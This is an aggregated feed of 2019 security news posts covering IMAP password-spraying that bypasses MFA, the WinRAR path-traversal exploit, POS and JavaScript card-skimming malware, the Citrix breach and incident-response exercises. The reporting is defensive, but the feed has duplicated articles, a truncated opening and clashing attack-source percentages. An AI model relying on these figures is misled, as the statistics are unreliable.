Attacks against Office 365 and G Suite cloud accounts using IMAP are difficult to protect against with multi-factor authentication, where service accounts and shared mailboxes are notably vulnerable.” reads the study published by Proofpoint. “At the same time, targeted, intelligent brute force attacks brought a new approach to traditional password-spraying, employing common variations of the usernames and passwords exposed in large credential dumps to compromise accounts.”

The experts analyzed over one hundred thousand unauthorized logins across millions of monitored cloud user-accounts, below key findings from the study:

  • 72% of tenants were targeted at least once by threat actors  
  • 40% of tenants had at least one compromised account in their environment  
  • Over 2% of active user-accounts were targeted by malicious actors 
  • 15 out of every 10,000 active user-accounts were successfully breached by attackers 

The attacker’s primary goal is to carry out internal phishing, especially when the initial target does not have the access needed to transfer money or data. The access to a cloud account could be exploited by attackers for lateral movements and to expand footholds within an organization via internal phishing and internal BEC. Experts observed that compromised accounts are also used to launch external attacks.    

Giving a look at the sources of the attacks, most of them come from Nigerian IP addresses (40%), followed by Chinese IP addresses (26%).

According to the study, IMAP was the most abused legacy protocol. IMAP is a legacy authentication protocol that bypasses multifactor authentication (MFA). Experts pointed out that these attacks avoid account lock-out and appear as isolated failed logins and for this reason, they are hard to detect.

Below other data provided by the experts:

  • Approximately 60% of Microsoft Office 365 and G Suite tenants were targeted with IMAP-based password-spraying attacks 
  • Roughly 25% of Office 365 and G Suite tenants experienced a successful breach as a result 
  • Threat actors achieved a 44% success rate breaching an account at a targeted organization 

The experts observed a large number of IMAP-based password-spraying campaigns between September 2018 and February 2019. Proofpoint reported that 10% of active user accounts in targeted tenants were hit and 1% of targeted user accounts were successfully breached.

IMAP protocol attacks phishing

The attackers leveraged a botnet composed of thousands of hijacked network devices (i.e. routers, servers) to launch the attacks.

“These hijacked devices gained access to a new tenant every 2.5 days on average during a 50-day period,” continues Proofpoint.

China was the source for the vast majority of the IMAP-based attacks (53%), followed by Brazil (39%) and the United States (31%).

Most of the attacks (63%) originated from Nigerian IP addresses, followed by South African infrastructure (21%), and the United States via VPNs (11%).

This study demonstrates the increasing sophistication of threat actors around the world who are leveraging brute force methods, massive credential dumps, and successful phishing attacks to compromise cloud accounts at unprecedented scale. Service accounts and shared mailboxes are particularly vulnerable while multifactor authentication has proven vulnerable.” concludes the study.

“Attackers parlay successful compromises into internal phishing attacks, lateral movement in organizations, and additional compromises at trusted external organizations.”

Pierluigi Paganini

(SecurityAffairs – IMAP, hacking)

The post Massive attacks bypass MFA on Office 365 and G Suite accounts via IMAP Protocol appeared first on Security Affairs.



Security Affairs

US-CERT warns of New Zealand mosque shooting scams and malware campaigns

In the wake of the New Zealand mosque shooting, the CISA recommends users to remain vigilant on possible scams and malware attacks.

Yesterday the horrible mass mosque shooting in New Zealand made the headlines, fifty people were killed. A gunman used GoPro to transmit a live stream of the massacre at a mosque.

New Zealand mosque shooting
Source: The Financial Times

Despite social media companies immediately removed the content from their platforms it is still possible to find multiple copies of the shooting videos online.

YouTube issued a statement condemning the snuff videos, confirming that it is removing them from its platform.

Unfortunately, curious people are searching for the video of the
New Zealand mosque shooting and crooks are aware of that and are attempting to exploit the interest in the cruel footage.

In the wake of the New Zealand mosque shooting, the Cybersecurity and Infrastructure Security Agency (CISA) recommends users to remain vigilant on possible scams and malware attacks.

Government experts are warning of spam campaigns using messages containing links pointing to malware or using malicious attachments.

“Users should exercise caution in handling emails related to the shooting, even if they appear to originate from trusted sources.” reads the security advisory published by the US-CERT. “Fraudulent emails often contain links or attachments that direct users to phishing or malware-infected websites.”

Experts believe attackers could use fake emails requesting donations from charitable organizations are, the US-CERT warns of fraudulent social media pleas, calls, texts, donation websites, and door-to-door solicitations relating to the event.

To avoid becoming a victim of malicious activity, users have to use caution when opening email attachments, even if the messages are sent from trusted sources. Another best practice consists of avoiding to click on links in unsolicited email messages.

Pierluigi Paganini

(SecurityAffairs – New Zealand mosque shooting, hacking)

The post US-CERT warns of New Zealand mosque shooting scams and malware campaigns appeared first on Security Affairs.

Security Affairs: US-CERT warns of New Zealand mosque shooting scams and malware campaigns

In the wake of the New Zealand mosque shooting, the CISA recommends users to remain vigilant on possible scams and malware attacks.

Yesterday the horrible mass mosque shooting in New Zealand made the headlines, fifty people were killed. A gunman used GoPro to transmit a live stream of the massacre at a mosque.

New Zealand mosque shooting
Source: The Financial Times

Despite social media companies immediately removed the content from their platforms it is still possible to find multiple copies of the shooting videos online.

YouTube issued a statement condemning the snuff videos, confirming that it is removing them from its platform.

Unfortunately, curious people are searching for the video of the
New Zealand mosque shooting and crooks are aware of that and are attempting to exploit the interest in the cruel footage.

In the wake of the New Zealand mosque shooting, the Cybersecurity and Infrastructure Security Agency (CISA) recommends users to remain vigilant on possible scams and malware attacks.

Government experts are warning of spam campaigns using messages containing links pointing to malware or using malicious attachments.

“Users should exercise caution in handling emails related to the shooting, even if they appear to originate from trusted sources.” reads the security advisory published by the US-CERT. “Fraudulent emails often contain links or attachments that direct users to phishing or malware-infected websites.”

Experts believe attackers could use fake emails requesting donations from charitable organizations are, the US-CERT warns of fraudulent social media pleas, calls, texts, donation websites, and door-to-door solicitations relating to the event.

To avoid becoming a victim of malicious activity, users have to use caution when opening email attachments, even if the messages are sent from trusted sources. Another best practice consists of avoiding to click on links in unsolicited email messages.

Pierluigi Paganini

(SecurityAffairs – New Zealand mosque shooting, hacking)

The post US-CERT warns of New Zealand mosque shooting scams and malware campaigns appeared first on Security Affairs.



Security Affairs

E Hacking News – Latest Hacker News and IT Security News: Hacker who was offering Cybercrime-as-a-service detained in Novokuznetsk



Employees of the Ministry of Internal Affairs of Russia with the assistance of experts of Group-IB, an international company specializing in the prevention of cyber attacks, detained a hacker in Russian city Novokuznetsk who hacked computers around the world.

The detainee offered Cybercrime-as-a-service services to cyber criminals.  He created and maintained admin panels for managing malware and botnets. 
 
According to the local report, he infected more than 50 thousands computers across the world.  He managed to steal usernames and passwords from browsers, mail clients of the infected computers.  He also reportedly stole financial information such as bank card details.

The investigation began in the spring of 2018, when the hacker infected around 1000 of computers with malicious software Formgrabber.

"He administered the botnet, which counted several thousand infected computers of Russian and foreign users,” the press service of the Ministry of Internal Affairs reported.

It turned out that the hacker is only 26 years old, since 15 he has earned money by creating websites for computer games, but then he decided to learn the profession of a hacker.  More recently, he was testing malware targeting Android platform.

He has already been charged under the article "Creation and distribution of malicious computer programs". He completely admitted his guilt.


E Hacking News - Latest Hacker News and IT Security News

Hacker who was offering Cybercrime-as-a-service detained in Novokuznetsk



Employees of the Ministry of Internal Affairs of Russia with the assistance of experts of Group-IB, an international company specializing in the prevention of cyber attacks, detained a hacker in Russian city Novokuznetsk who hacked computers around the world.

The detainee offered Cybercrime-as-a-service services to cyber criminals.  He created and maintained admin panels for managing malware and botnets. 
 
According to the local report, he infected more than 50 thousands computers across the world.  He managed to steal usernames and passwords from browsers, mail clients of the infected computers.  He also reportedly stole financial information such as bank card details.

The investigation began in the spring of 2018, when the hacker infected around 1000 of computers with malicious software Formgrabber.

"He administered the botnet, which counted several thousand infected computers of Russian and foreign users,” the press service of the Ministry of Internal Affairs reported.

It turned out that the hacker is only 26 years old, since 15 he has earned money by creating websites for computer games, but then he decided to learn the profession of a hacker.  More recently, he was testing malware targeting Android platform.

He has already been charged under the article "Creation and distribution of malicious computer programs". He completely admitted his guilt.

Counter-Strike 1.6 game client 0-day exploited to spread Belonard trojan

By Waqas

Dr. Web’s cybersecurity researchers have identified an attacker is trying to exploit zero-day vulnerabilities in Counter-Strike 1.6 game specifically to distribute Belonard Trojan. Reportedly, about 39% of all the active servers of the game on Steam have been manipulated and compromised to hack the computers of gamers from a remote location. Counter-Strike 1.6, released around […]

This is a post from HackRead.com Read the original post: Counter-Strike 1.6 game client 0-day exploited to spread Belonard trojan

Recently fixed WinRAR bug actively exploited in the wild

Several threat actors are still exploiting a recently patched critical vulnerability in the popular compression software WinRAR.

Several threat actors are actively exploiting a critical remote code execution vulnerability recently addressed in WinRAR.

The exploitation of the flaw in the wild is worrisome because the WinRAR software doesn’t have an auto-update feature, leaving millions of users potentially exposed to cyber attacks.

The vulnerability, tracked as CVE-2018-20250, was discovered by experts at Check Point in February, it could allow an attacker to gain the control of the target system.

Over 500 million users worldwide use the popular software and are potentially impacted by the flaw that affects all versions of released in the last 19 years.

The flaw is an “Absolute Path Traversal” issue in the library that could be exploited to execute arbitrary code by using a specially-crafted file archive.

winrar

The issue affects a third-party library, called UNACEV2.DLL that is used by WINRAR, it resides in the way an old third-party library, called UNACEV2.DLL, handles the extraction of files compressed in ACE data format. The experts pointed out that WinRAR determines the file format by analyzing its content and not the extension, this means that an attacker can change the .ace extension to .rar extension to trick the victims.

The researchers discovered that an attacker leveraging the path traversal vulnerability could extract compressed files to a folder of their choice rather than the folder chosen by the user. Dropping a malicious code into Windows Startup folder it would automatically run on the next reboot.

The WinRAR development team addressed the issue with the release of WinRAR version 5.70 beta 1.

The following video PoC shows how to gain full control over a targeted system by tricking the victims into opening maliciously crafted compressed archive file using WinRAR.

WA few days after the disclosure of the flaw, researchers at the 360 Threat Intelligence Center discovered a malspam campaign that was distributing a malicious RAR archive that could exploit the flaw to install deliver malware on a computer.

Now, security experts from McAfee reported that attackers are continuing in exploiting the WinRAR flaw, they identified more than “100 unique exploits and counting” in the first week since the vulnerability was publicly disclosed.

“In the first week since the vulnerability was disclosed, McAfee has identified over 100 unique exploits and counting, with most of the initial targets residing in the United States at the time of writing.” reads the advisory published by McAfee.

According to the experts, most of the initial targets are located in the United States, in one case attackers attempted to spread the malware through a bootlegged copy of Ariana Grande’s hit album “Thank U, Next” with a file name of “Ariana_Grande-thank_u,_next(2019)_[320].rar

The file associated with the fake Ariana Grande’s hit album is currently detected by a limited number of antivirus solutions.

The malicious RAR file (Ariana_Grande-thank_u,_next(2019)_[320].rar) extracts a list of harmless MP3 files to the victim’s download folder along with a malicious executable file to the startup folder that allows infecting the targeted system.

“When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes. User Access Control (UAC) is bypassed, so no alert is displayed to the user. The next time the system restarts, the malware is run.” continues the analysis.

Experts recommend users to keep their system up to date, install the latest version of WinRAR and avoid opening files from untrusted sources.

Pierluigi Paganini

(SecurityAffairs – WinRAR, hacking)

The post Recently fixed WinRAR bug actively exploited in the wild appeared first on Security Affairs.

Ransomware’s New Normal

GandCrab’s evolution underscores a shift in ransomware attack methods. Don’t be fooled by the drop in overall ransomware attacks this past year: Fewer but more targeted and lucrative campaigns against

The post Ransomware’s New Normal appeared first on The Cyber Security Place.

GlitchPOS PoS Malware appears in the cybercrime underground

A new piece of PoS malware appeared in the threat landscape, the malicious code dubbed GlitchPOS has been found on a crimeware forum.

The GlitchPOS malware is able to steal credit card numbers (Track1 and Track2) from the memory of the infected system, it uses a regular expression to perform this task.

The malicious code was discovered by experts from Cisco Talos, the pre-built malware goes for $250, while the builder goes for $600. Experts also found it on alternative websites at a higher price.

The PoS malware first appeared on February 2, the experts assess with high confidence it was developed by a vxer known as Edbitss that a few years ago was distributing the DiamondFox L!NK botnet.

“Cisco Talos recently discovered a new PoS malware that the attackers are selling on a crimeware forum. Our researchers also discovered the associated payloads with the malware, its infrastructure and control panel. ” reads the post published by Talos team.

GlitchPOS

The GlitchPOS malware is well designed and it is very easy to use, it was distributed via spam messages.

The malware is protected by a packer developed in VisualBasic, it pretends to be a game and the user interface of the main form contains various pictures of cats.

“The purpose of the packer is to decode a library that’s the real payload, encoded with the UPX packer,” continues the analysis.

“Once decoded, we gain access to GlitchPOS, a memory grabber developed in VisualBasic.”

The payload is very small and supports only a few functions, including registering the infected systems, receiving tasks from the C2, exfiltrating credit-card numbers from the memory of the infected systems, and cleaning itself.

The malicious code receives tasks from the C2 server, the commands are executed via a shellcode directly sent by the command and control server.

Researchers suspect that the seller behind GlitchPOS – who goes by the name “Edbitss” – has developed malware before.

Talos team found many similarities between the DiamondFox L!NK botnet and GlitchPOS, such as the malware language and the appearance of the panels (a circumstance that suggests the author reused a portion of code from DiamondFox panel).

“This investigation shows us that POS malware is still attractive and some people are still working on the development of this family of malware.” concludes Talos. “We can see that edbitss developed malware years even after being publicly mentioned by cybersecurity companies. He left DiamondFox to switch on a new project targeting point-of-sale. The sale opened a few weeks ago, so we don’t know yet how many people bought it or use it.”

Pierluigi Paganini

(SecurityAffairs – GlitchPOS, point-of-sale malware )

The post GlitchPOS PoS Malware appears in the cybercrime underground appeared first on Security Affairs.

SimBad malware on Play Store infected millions of Android devices

By Waqas

Most of the applications infected by SimBad malware are simulator games. The IT security researchers at Check Point have discovered a sophisticated malware campaign that has been targeting Android users through Google Play Store on a global level and so far more than 150 million users have fallen prey to it. Dubbed SimBad by researchers; the malware disguises […]

This is a post from HackRead.com Read the original post: SimBad malware on Play Store infected millions of Android devices

Payment data of thousands of customers of UK and US online stores could have been compromised

Group-IB, an international company that specializes in preventing cyberattacks, has uncovered a malicious code designed to steal customers’ payment data on seven online stores in the UK and the US.

The injected code has been identified as a new JavaScript Sniffer (JS Sniffer), dubbed by Group-IB as GMO. Group-IB Threat Intelligence team first discovered the GMO JS Sniffer on the website of the international sporting goods company FILA UK, which could have led to the theft of payment details of at least 5,600 customers for the past 4 months.  

Do your payments have the sniffles?

Most recent breaches similar to this include British Airways and Ticketmaster which were first analyzed by RiskIQ research team, where cybercriminals managed to compromise personal information of thousands of travelers and concert goers with a few of lines of code. British Airways and Ticketmaster websites were infected with JS Sniffers, a type of malicious code injected into a victim’s website designed to steal a consumer’s personal data including payment card details, names, credentials etc. FILA UK website (fila.co[.]uk) became cybercriminals’ new major target on the UK market . GMO JS Sniffer has also been discovered on 6 other websites of US-based companies. This type of attack is especially dangerous given that it can be applied to almost any e-commerce site around the world. Group-IB made multiple attempts to alert FILA, which was known to be impacted by GMO. Six other websites affected by this JS Sniffer were notified upon discovery as well. Group-IB team has also reached out to local authorities in the UK and the US to conduct outreach.

Group-IB’s Threat Intelligence team first discovered GMO on the FILA UK website. The malicious code was detected in early March 2019. In the course of further research it was revealed that GMO JS Sniffer has presumably been collecting customer payment data since November 2018. According to Alexa.com, the number of fila.co[.]uk unique monthly visitors is estimated at around 140k per month. According to IRP, UK market research firm, a minimum conversion into purchase for fashion and clothing ecommerce is equal to 1%. Using very conservative estimates, payment and personal details of at least 5,600 customers could have been stolen by cybercriminals – everyone who has purchased items on fila.co.uk since November 2018 has potentially had their details compromised. Typically, after customer data is stolen, it is usually resold on underground cardshops. Another scheme of cashing out involves the use of compromised cards to buy valuable goods, e.g. electronics, for onward sale.

“One-line card stealing code downloads a JavaScript Sniffer once a customer lands on a checkout page, which intercepts credit card data and sends it to local storage. After, the payment cards’ details are sent to the JS Sniffer’s gate which is located on the same server as a JS Sniffer script itself. Cybercriminals might have injected a malicious code by either exploiting a vulnerability of Magento CMS (content management system), used by FILA.co.uk, or simply by compromising the credentials of the website administrator using special spyware or cracking password with brute force methods” – comments Dmitry Volkov, CTO and Head of Threat Intelligence at Group-IB. “We dubbed this JS Sniffer family GMO because the malware uses gmo[.]li host.”

payment data 1

 Fig. 1 The screenshot shows a one-line code (line # 771) that downloads a JS Sniffer designed to steal customers’ data once a user lands on a checkout page.

payment data 2

Fig. 2 The screenshot shows part of the JS Sniffer that detects Chrome Dev Tools and Firebug & the Sniffer downloaded to user’s browser once a user lands on a checkout page

payment data 3

Fig. 3 The screenshot shows part of the JS Sniffer with functions for collecting victim’s billing and payment information and sending extracted information to cybercriminals via image request

payment data 4

Fig. 4 The screenshot shows part of the JS Sniffer that calls functions for collecting and sending victim’s payment information to cybercriminals

Later Group-IB’s specialists found other websites infected with GMO JS Sniffer. The list included six ecommerce stores with a total of around 350,000 monthly unique visitors (according to Alexa.com rankings): http://jungleeny[.]com (Home design store), https://forshaw[.]com/ (Pest Management Products Store), https://www.absolutenewyork[.]com/ (Cosmetics Store),https://www.cajungrocer[.]com/ (Online Grocery Store), https://www.getrxd[.]com/ (Training Equipment Store), https://www.sharbor[.]com/ (Video Editing Apparel store).

E pluribus unum?

GMO is a family of JS Sniffers that targets Magento-based online stores. GMO can detect Firebug and Google Developer Tools, which allows the sniffer to remain undetected. Group-IB’s Threat Intelligence team discovered that GMO has been active since May 2018. The domain name used for the sniffer’s codes storage and as a gate for stolen data collection was registered on May 7, 2018. The newly discovered GMO JS Sniffer is one of the 15 families of sniffers described by Group-IB in its new report that the company is prepping to release soon. Group-IB Threat Intelligence customers will be the first to receive the report. Nine out of these fifteen JS Sniffers’ families were not previously researched.

“JS Sniffers is a type of malware that remains poorly researched. Despite its simplicity, it is capable of causing massive financial and reputational damage to huge international corporations and therefore should not be underestimated. Recent data breaches at British Airways and Ticketmaster proved this point. And not only small online stores get affected, but also payment systems and banks whose clients’ suffer from payment data leaks. The umbrella term “Magecart” given to these attacks by RiskIQ analysts should be much broader than that. There are many more groups using distinct families of JS Sniffers capable of targeting online stores. Since in some cases it is difficult to determine how many people use the sniffer, Group-IB experts call them families, not groups. Every family of JS Sniffers has unique characteristics and requires a detailed analysis,”– says Dmitry Volkov.

“Group-IB Threat Intelligence team continuously analyses new types of JS Sniffers: multipurpose and specific, designed to target particular content management systems. Considering, the size of the market and the mounting threat JS Sniffers pose Group-IB decided to analyze several sniffers’ families enriching the knowledge about this malware significantly adding to the prior attempts to research JS Sniffers.”

About the author: About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – payment data, cybercrime )

The post Payment data of thousands of customers of UK and US online stores could have been compromised appeared first on Security Affairs.

Torrent Risks: How to get infected through torrent with a good reputation

Experts at Z-Lab Yoroi/Cybaze have conducted an interesting analysis on the risks for users downloading films, games, and software through Torrent.

Digital media sharing is one of the most relevant phenomena since the advent of the internet. During the 80’s and 90’s, with the rapid growth the Internet, people around the world started sharing digital stuff protected by copyright, through particular communication protocols and programs such as FTP, IRC, etc.

At the time, only a few people had the capability to access to these illegal networks. Today the situation is quite different, it is very easy to share any kind of content through simplified file-sharing services making it easy to obtain copyrighted material and pirated copies of popular software.

Cybaze-Yoroi Z-Lab researchers conducted a study on the risks related to the use of the BitTorrent protocol to download movies, games or pirated software. The analysis shed the light on the risk faced by users while searching for movies, games, and software on popular BitTorrent trackers. The experts analyzed dozens of torrents and discovered that most of them are delivered in bundle with malware or Adware, exposing at risk of infection the average user with a few interactions.

In this analysis, researcher downloaded torrents belonging to 3 different categories of interest: Movies, Games and Software. They searched for 2 highly anticipated films : “The Avengers 4” and “Joker” for the “Movies” category, for the “Games” category they search for “Fortnite”, one of the most played videogame and, for the “Software” category they searched for some of the most requested software of this moment, “Nero Burning Rom”, “Adobe Photoshop Lightroom” and “Malwarebytes Premium”.

Experts discovered that most of the torrents contains well-known malware that are currently detected by most anti-viruses and, also, most of the malicious torrents have a good reputation in terms of seeders. In the BitTorrent terminology, seeders are …

torrent risks

Download the full White Paper

Torrem

The post Torrent Risks: How to get infected through torrent with a good reputation appeared first on Security Affairs.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week, the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond", a recap of the points I made.
Cloud is the 'Default Model' for Business
Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes successful business continually craves. Indeed, the 'scales of economy' benefits are not just most cost-effective and more agile IT services, but also include better cybersecurity (by the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business' cloud service mitigation, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given they ultimately own the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example with a PaaS model, the business is fully responsible for application deployment onto the cloud platform, and therefore the security of applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. The example of the 'shared' responsibility with this model, are the processes in providing and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.


A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversight the controls and processes through regular assessments.

Citrix Discloses Data Breach By International Cyber Criminals


An enormous data breach by "international cyber criminals" of the famous enterprise software company Citrix was unveiled a weekend ago, reporting the breach of its internal network.

The software company which is known to provide its services, especially to the U.S. military, the FBI, numerous U.S. organizations, and different U.S. government offices was cautioned by the FBI of foreign hackers compromising its IT systems and sneak "business documents," likewise including that the company did not know exactly which records and documents the hackers acquired nor how they even got in, in the first place.

In a blog post Citrix says that, “While not confirmed, the FBI has advised that the hackers likely used a tactic known as password spraying, a technique that exploits weak passwords. Once they gained a foothold with limited access, they worked to circumvent additional layers of security...”
"Password spraying” is an attack where the attackers surmise weak passwords to pick up an early toehold in the company's system in order to launch more extensive attacks.

The enormous data breach at Citrix has been distinguished as a part of "a sophisticated cyber espionage campaign supported by nation-state due to strong targeting on government, military-industrial complex, energy companies, financial institutions and large enterprises involved in critical areas of the economy," said Rescurity, an infosec firm in a blog post.

The researchers at Resecurity shed all the more light on the episode when Citrix refused to disclose the numerous insights regarding the breach, guaranteeing that it had prior cautioned the Feds and Citrix about the "targeted attack and data breach."

In spite of the fact that Resecurity says that the Iranian-backed IRIDIUM hacker group hit Citrix in December a year ago and yet again on Monday i.e. the 4th of March and purportedly stole approximately 6 terabytes of sensitive internal files including messages, emails, blueprints and various other documents as well.

While this Florida-based company focused on the fact that there was no sign that the hackers bargained any Citrix product or service, and that it propelled a "forensic investigation," procured the best cyber security company, and took "actions" to skilfully secure its internal network.


Since the consequences of the Citrix 'security incident' are grave and they could influence a more extensive scope of targets, as the company holds sensitive data on other companies as well, including critical infrastructure, government and enterprises, therefore,  strict measures will be thusly taken to secure it inside-out.

Enterprise VPN Provider Citrix, Hacked; 6TB of Sensitive Data Stolen



Enterprise VPN provider, Citrix, was subjected to a hack which is doubted to have stolen private data pertaining to the company’s technology.

On Friday, Citrix told that FBI informed them about "international cyber criminals" working their way into the organization’s networks.

They were further told that most probably the criminals resorted to the technique of “password spraying” to break into the company’s networks. They did do by appropriately guessing the password to an account which belongs to the company.

The hackers involved are reported to be a part of an Iranian Hacking group which has attacked over 200 companies, along with multiple government agencies, technology firms and gas, and oil companies.

Referenced from a blog post by Resecurity, the cybersecurity firm contacted Citrix in an attempt to warn them about the hack which was on the way.

And, while refraining from telling the origins of the source from where the firm learned of the hack, it said that it "has shared the acquired intelligence with law enforcement and partners for mitigation."

While FBI denied commenting on the matter, Resecurity drew a connection between the hackers and a nation state, "due to strong targeting on government, military-industrial complex, energy companies, financial institutions and large enterprises involved in critical areas of economy."

Citrix expressed a probability of business documents being acquired and downloaded by the attackers and told in a notice, "The specific documents that may have been accessed, however, are currently unknown."

"Citrix has taken action to contain this incident. We commenced a forensic investigation; engaged a leading cybersecurity firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI," the company further included in the notice.


Applicants data of 3 elite US colleges hacked for ransom

By Ryan De Souza

Recently it was reported that Chinese hackers are aiming to target around 26 leading research academies to steal research about maritime technology, the majority of which happen to be based in the USA. In the same week, three mainstream private colleges have claimed that their systems were hacked and hackers managed to gain access to […]

This is a post from HackRead.com Read the original post: Applicants data of 3 elite US colleges hacked for ransom

Hackers steal 6TB of data from enterprise software developer Citrix

By Waqas

Enterprise software developer Citrix becomes a victim of state-sponsored hack attack after hackers steal the company’s secrets. One of the most popular enterprise software and networking and remote access technology provider firm Citrix affirmed that its internal network was compromised by international criminals. Reportedly, the attackers exploited weak passwords and managed to get limited access […]

This is a post from HackRead.com Read the original post: Hackers steal 6TB of data from enterprise software developer Citrix

Games people play: testing cybersecurity plans with table-top exercises

If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.

These exercises are designed to be immersive. They might start with a scenario like a board meeting, or a company orientation day. All participants will get a role to play; for the purpose of the session, they might be designated as a head of HR, finance, legal, or IT. As the scenario starts to unfold, a message arrives. The press has been enquiring about a major data breach or a ransomware attack on the company.

Muscles tighten, a wave of nausea passes over the stomach. The fight-or-flight instinct starts to take hold. Your role might say manager, but you don’t feel like you’re in control.

What happens next?

That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.

The exercise should prompt plenty of questions for the participants. What exactly is going on? How do we find out what’s happened? How is this affecting operations? Who’s taking charge? What do we tell staff, or the public, or the media?

A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).

Other organisations may already have a series of steps for what to do in the event of an incident or breach. In these cases, the table-top exercise is about testing the viability of those plans. You can be prepared, but do the steps on paper work in practice? Or as Mike Tyson memorably put it, “everybody has a plan until they get punched in the mouth”.

The exercise can show the value of having a playbook that documents all procedures to carry out: “if X happens, then do Y”. This will also shed light on missing steps, such as contact numbers for key company executives, an external security consultant, regulators, law enforcement, or media.

Fail to prepare, prepare to fail

When it comes to developing or refining an incident response plan, the devil is in the detail, says David Prendergast, senior cybersecurity consultant at BH Consulting. Here are some useful questions to ask:

  • If your policy says: ‘contact the regulator’, ask which one(s)
  • Who is the specific point of contact at the regulators office?
  • Does the organisation have the email address or phone numbers for that person?
  • Who in your company or agency is authorised to talk to the regulator?
  • What information are they likely to need to have that conversation?
  • Do you have pre-prepared scripts or statements for when things might go wrong (for customers, stakeholders, staff, and media (including social media channels)?

It might also force the company into making certain decisions about resources. Are there enough internal staff to carry out an investigation? Is that the most appropriate use for those employees, or is it better to focus their efforts on recovering IT systems?

That’s the value in table-top exercises: they afford the time to practice when it’s calm and you can absorb the lessons. There are plenty of examples of companies that handled similar situations spectacularly badly in full public view. (We won’t name names, but the list includes anyone who uttered the words “sophisticated attack” before an investigation even started.)

By the (play)book

It’s more helpful to learn from positive examples of companies that showed leadership in the face of a serious incident. That can be as simple as a statement of business priorities while an organisation copes with the fallout. In 2017, as Maersk reeled from a ransomware infection, CEO Soren Skou gave frontline staff in 130 countries clear instructions. As the Financial Times reported, the message was unequivocal even as the company was forced into shutting down IT systems. “Do what you think is right to serve the customer – don’t wait for the HQ, we’ll accept the cost.”

Some larger companies will run an exercise just for themselves, but some organisations run joint war-gaming scenarios with industry peers. Earlier this month, financial institutions and trade associations from around Europe carried out a simulated ransomware attack.

According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.

Whether it’s a war-gaming exercise or a table-top event, the goal is the same: to be ready for the worst ahead of time, and knowing what steps are available to you when bad things happen for real.

The post Games people play: testing cybersecurity plans with table-top exercises appeared first on BH Consulting.

Upcoming cybersecurity events featuring BH Consulting

Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy. 

Tech Connect Live 2019: Dublin, 30 May

BH Consulting COO Valerie Lyons will be presenting at this event which takes place at the RDS in Dublin on Thursday 30 May. The conference is a business and technology event, with talks on a range of related subjects happening throughout the day. The event is free to attend, and more than 5,000 delegates are expected on the day. To find out more and to register for a free pass, visit here

Data Protection Officer certification course: Vilnius/Maastricht June/July

BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here

IAM Annual Conference: Dublin, 28-30 August

Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page. 

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

The Business of Organised Cybercrime

Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.

Current perceptions surrounding Cybergangs

Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

